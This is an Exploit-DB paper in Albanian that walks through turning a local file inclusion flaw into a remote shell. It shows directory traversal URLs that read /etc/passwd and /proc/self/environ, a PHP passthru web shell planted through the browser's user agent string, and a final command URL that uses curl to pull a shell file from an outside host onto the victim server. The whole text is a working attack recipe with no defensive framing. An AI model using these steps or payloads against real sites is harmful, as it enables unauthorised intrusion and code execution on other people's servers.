[Albanian] Shell Over LFI

EDB-ID:

13558

CVE:

N/A

Author:

bi0

Type:

papers

Platform:

Multiple

Published:

2009-12-12

--------------------------------------------------------------
 [x] Paper : [Albanian] Shell Over LFI
 [+] Author : bi0
 [x] Contact : bukibv@hotmail.com
 [x] Date : 12/12/2009
 [x] Site : www.it-security.ws / www.ssteam.ws
 [x] Thanks : packetdeath,redking,sp1r1t & all my Friends ...
--------------------------------------------------------------

                  ______     __     ______
                 /\  == \   /\ \   /\  __ \
                 \ \  __<   \ \ \  \ \ \/\ \
                  \ \_____\  \ \_\  \ \_____\
                   \/_____/   \/_/   \/_____/

                   01000010 01101001 01001111
               [-]----------------------------[-]
                |                              |
                |  1. Nje Site LFI Vuln        |
                |  2. Modifikimi i User Agent  |
                |  3. Enjoy your Shell         |
                |                              |
               [-]----------------------------[-]



 [1]. Na nevojitet nje site LFI vuln psh :

 [x] http://example.com/index.php?file=serach.php

 Zevendesojm "search.php" me "../" dhe nese na jep error si ne vijim osht LFI vuln psh :

 Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php on line 514
 Tash e dimë se "/" gjindet 4 dir me lart pra :

 [x] http://example.com/index.php?file=../../../../etc/passwd

 Tash shikojm se a ka "logs" qe ruhen ne : /proc/self/environ,
 Pra "/etc/passwd" e zevendesojm me "/proc/self/environ"

 [x] http://example.com/index.php?file=../../../../proc/self/environ

 Nese na del diqka si : "DOCUMENT_ROOT=" atëher i kemi gjetur "logs"

 [2].Modifikimi i User Agentiti :

 Shkojm te FireFox Browser URL the shkruajm : "about:config"
 Te "Filter" shkruajm : "general.useragent.extra.firefox" the na paraqitet diqka keshtu :
----------------------------------------------------------------------------
 Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.5.5
----------------------------------------------------------------------------
 Klikojm 2 here mbi "Firefox/3.5.5" dhe aty e shkruan :

 <? passthru($_GET['c']); ?>

 Per modifikm e User Agent mud ta perdorni edhe "User Agent Switcher" FireFox add-on

 [3]. Enjoy your Shell..

 Tash modifikimi perfundoj tash shkojm ketu :

 [x] http://example.com/index.php?file=../../../../proc/self/environ

 Ne Fund ja shtojm : &c=

 [x] http://example.com/index.php?file=../../../../proc/self/environ&c=

  Nese doni te vendosni shell vetem e shkruani :

 [x] http://example.com/index.php?file=../../../../proc/self/environ&c=curl http://shellsite.com/locus7s.txt -o shell.php

 Mund te perdorni edhe downloader tjeter ..
 Tash shellin e kemi :

 [x] http://example.com/shell.php

 Kaloni Mir ..

#EOF